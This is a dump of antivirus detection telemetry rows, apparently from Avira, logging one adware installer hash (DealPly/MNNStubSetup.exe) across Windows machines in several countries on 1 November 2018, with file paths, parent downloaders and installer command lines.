  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp1266706\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/RSF \\\\\\/ppn:YHhybg0dXAt1eGqREw \\\\\\/mnl', country='MX', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc='C:\\Users\\X\\Downloads\\aTube_Catcher_3435473628.exe', parentsize=2610712, timestamp='2018-11-01T15:05:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181031-210731-28f1c3cb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_579e1550\\AVSCAN-20181031-210339-10A15C0C\\AVSCAN-20181031-210731-28F1C3CB', filesize=576000, name='Adware/DealPly.182b23.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T00:07:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp3242375\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/restart \\\\\\/minimized \\\\\\/froma', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\ByteFence\\ByteFence.exe', parentsize=3709256, timestamp='2018-11-01T00:07:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181031-234234-1b296296', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9be25e36\\AVSCAN-20181031-232508-97335948\\AVSCAN-20181031-234234-1B296296', filesize=576000, name='Adware/DealPly.182b23.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T06:42:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181031-210722-280293ee', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_579e1550\\AVSCAN-20181031-210339-10A15C0C\\AVSCAN-20181031-210722-280293EE', filesize=576000, name='Adware/DealPly.182b23.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T00:07:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp3242375\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='D:\\Pastas do Usuario\\Downloads\\Baixaki_baixar-musicas-gratis_2976929079.exe', parentsize=2202824, timestamp='2018-11-01T00:07:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-141635-6a966d57', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d93eb456\\AVSCAN-20181101-140520-1BEBFBF6\\AVSCAN-20181101-141635-6A966D57', filesize=576000, name='Adware/DealPly.182b23.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:16:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp7144458\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T22:26:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp7144458\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T22:26:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-201230-5481f52c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9636cbec\\AVSCAN-20181101-201113-48EAB96E\\AVSCAN-20181101-201230-5481F52C', filesize=576000, name='Adware/DealPly.182b23.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T23:12:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp10181478\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/RSF \\\\\\/ppn:YyhwYgxaFRAiP211FM5W \\\\\\/mnl', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Downloads\\Ferrugem - Só As Melhores de Outubro 2018 Ao Vivo_1335299250.exe', parentsize=2515144, timestamp='2018-11-01T19:41:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181031-210523-1b8a32da', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_579e1550\\AVSCAN-20181031-210339-10A15C0C\\AVSCAN-20181031-210523-1B8A32DA', filesize=576000, name='Adware/DealPly.182b23.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T00:05:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp8034363\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T15:12:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181031-210549-1e3f7ad9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_579e1550\\AVSCAN-20181031-210339-10A15C0C\\AVSCAN-20181031-210549-1E3F7AD9', filesize=576000, name='Adware/DealPly.182b23.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T00:05:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-181311-f98cd690', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_76e5719a\\AVSCAN-20181101-181246-F6440152\\AVSCAN-20181101-181311-F98CD690', filesize=576000, name='Adware/DealPly.182b23.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:13:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp2711753\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='PE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Downloads\\nir-cmd-programas-gratis-net_2072453430.exe', parentsize=2308292, timestamp='2018-11-01T02:09:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp1989859\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Downloads\\MX vs. ATV Untamed (USA)_0678088867.exe', parentsize=2575215, timestamp='2018-11-01T05:31:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp8034363\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/RSF \\\\\\/ppn:T\\\\\\/ZhdDu0ExtMx3ZpYqIODFRnjg \\\\\\/mnl', country='CL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Downloads\\aTube_Catcher_0223243035.exe', parentsize=2610712, timestamp='2018-11-01T15:12:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-181326-fb7b3a08', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_76e5719a\\AVSCAN-20181101-181246-F6440152\\AVSCAN-20181101-181326-FB7B3A08', filesize=576000, name='Adware/DealPly.182b23.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:13:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp5180272\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/restart \\\\\\/minimized \\\\\\/froma', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\ByteFence\\ByteFence.exe', parentsize=3722568, timestamp='2018-11-01T01:58:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-181340-fd2bc254', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_76e5719a\\AVSCAN-20181101-181246-F6440152\\AVSCAN-20181101-181340-FD2BC254', filesize=576000, name='Adware/DealPly.182b23.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:13:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp2481455\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/RSF \\\\\\/ppn:YyhwYgxaFRAiP211FM5W \\\\\\/mnl', country='BR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Users\\X\\Downloads\\grand-theft-auto-vice-city_3368427903.exe', parentsize=2401560, timestamp='2018-11-01T00:27:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp1255236\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:18:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp1255236\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/RSF \\\\\\/ppn:YyhwYgxaFRAiP211FM5W \\\\\\/mnl', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Documents\\Downloads\\partition-table-doctor_VvT5HH_3476430274.exe', parentsize=2328135, timestamp='2018-11-01T07:18:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp7096569\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/SL5=\\\\\\"$703DC,11849392,56832,C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\CheatEngine67.exe\\\\\\" \\\\\\/SPAWNWND=$803E2 \\\\\\/NOTIFYWND=$903B8 ', country='PH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\is-STNMA.tmp\\CheatEngine67.tmp', parentsize=723552, timestamp='2018-11-01T05:46:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp7096569\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/SL5=\\\\\\"$703DC,11849392,56832,C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\CheatEngine67.exe\\\\\\" \\\\\\/SPAWNWND=$803E2 \\\\\\/NOTIFYWND=$903B8 ', country='PH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\is-STNMA.tmp\\CheatEngine67.tmp', parentsize=723552, timestamp='2018-11-01T05:46:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp8255700\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Bit94B0.tmp.exe', parentsize=2690240, timestamp='2018-11-01T10:50:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-185150-7b8c9c43', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_385ad61b\\AVSCAN-20181101-185102-7404AC97\\AVSCAN-20181101-185150-7B8C9C43', filesize=576000, name='Adware/DealPly.182b23.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:52:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181031-210540-1d5ce09b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_579e1550\\AVSCAN-20181031-210339-10A15C0C\\AVSCAN-20181031-210540-1D5CE09B', filesize=576000, name='Adware/DealPly.182b23.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T00:05:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp7096569\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T05:46:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181031-210517-1af7be75', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_579e1550\\AVSCAN-20181031-210339-10A15C0C\\AVSCAN-20181031-210517-1AF7BE75', filesize=576000, name='Adware/DealPly.182b23.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T00:05:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\tmp10526790\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T04:19:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-182102-35b5b008', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8385e50e\\AVSCAN-20181101-182043-3346EDBA\\AVSCAN-20181101-182102-35B5B008', filesize=576000, name='Adware/DealPly.182b23.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:21:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp7465884\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/RSF \\\\\\/ppn:YHhybg0dXAt1eGqREw \\\\\\/ads:1 \\\\\\/mnl', country='BR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Users\\X\\Downloads\\helloneighbor_1260572563.exe', parentsize=2367968, timestamp='2018-11-01T20:32:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp7465884\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T20:32:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-175544-73c0c25d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_16b55ae7\\AVSCAN-20181101-175517-7042858D\\AVSCAN-20181101-175544-73C0C25D', filesize=576000, name='Adware/DealPly.182b23.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:55:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp3881178\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Downloads\\slitherio (1).exe', parentsize=2400760, timestamp='2018-11-01T16:55:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp2927130\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Downloads\\sallys-salon_3361492520.exe', parentsize=2418296, timestamp='2018-11-01T10:33:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp5586395\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/RSF \\\\\\/ppn:YHhybg0dXAt1eGqREw \\\\\\/ads:1 \\\\\\/mnl', country='IT', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Users\\X\\Downloads\\aTube_Catcher_4280006417.exe', parentsize=2593072, timestamp='2018-11-01T11:20:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp5586395\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T11:20:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp9495008\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/RSF \\\\\\/ppn:YyhwYgxaFRAiP211FM5W \\\\\\/mnl', country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Downloads\\opengl_2860391392.exe', parentsize=2488056, timestamp='2018-11-01T17:33:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp4735605\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:33:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp10492650\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T23:10:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp10492650\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T23:10:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp10327267\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T03:04:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp10327267\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T03:04:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp10492650\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T23:10:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp10441571\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/RSF \\\\\\/ppn:YHhybg0dXAt1eGqREw \\\\\\/mnl', country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Downloads\\happy-wheels (1).exe', parentsize=2508528, timestamp='2018-11-01T17:20:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp5122348\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/RSF \\\\\\/ppn:YyhwYgxaFRAiP211FM5W \\\\\\/mnl', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Desktop\\Elshayal_Smart_Downloader_3192770573.exe', parentsize=1885792, timestamp='2018-11-01T04:38:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181031-233030-bfe30f07', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9be25e36\\AVSCAN-20181031-232508-97335948\\AVSCAN-20181031-233030-BFE30F07', filesize=576000, name='Adware/DealPly.182b23.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T06:30:31Z'), dt=datetime.date(2018, 11, 1)),
